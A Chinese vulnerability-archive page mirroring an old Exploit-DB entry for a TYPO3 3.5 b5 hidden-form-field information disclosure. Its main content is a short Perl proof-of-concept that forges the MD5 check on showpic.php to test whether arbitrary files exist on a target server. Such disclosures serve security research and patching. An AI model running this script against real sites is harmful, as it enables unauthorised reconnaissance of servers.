Typo3 3.5 b5 – HTML Hidden Form Field Information Disclosure Weakness (1)

Typo3 3.5 b5 – HTML Hidden Form Field Information Disclosure Weakness (1)

漏洞ID 1053728 漏洞类型
发布时间 2003-02-28 更新时间 2003-02-28
图片[1]-Typo3 3.5 b5 – HTML Hidden Form Field Information Disclosure Weakness (1)-安全小百科CVE编号 N/A
图片[2]-Typo3 3.5 b5 – HTML Hidden Form Field Information Disclosure Weakness (1)-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22315
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6993/info

Clients of TYPO3 systems may access potentially sensitive data that have been obfuscated through hidden form fields. This may aid in exploiting other known issues in the software. 

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use Digest::MD5 qw(md5_hex);
($ho,$fi) = @ARGV;
$md5 = md5_hex("$fi||||");
$ua = new LWP::UserAgent(); $ua->agent("Opera 6.0");
$uri = "http://".$ho."/typo3/showpic.php?file=$fi&md5=$md5";
$req = HTTP::Request->new("GET",$uri);
$res = $ua->request($req);
if ($res->content !~ /was not found/ && $res->content !~ /No valid/) {print "n$fi existsn";}
else {print "n$fi not foundn";}

相关推荐: BizDB bizdb-search.cgi Remote Command Execution Vulnerability

BizDB bizdb-search.cgi Remote Command Execution Vulnerability 漏洞ID 1104241 漏洞类型 Input Validation Error 发布时间 2000-04-13 更新时间 2000-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享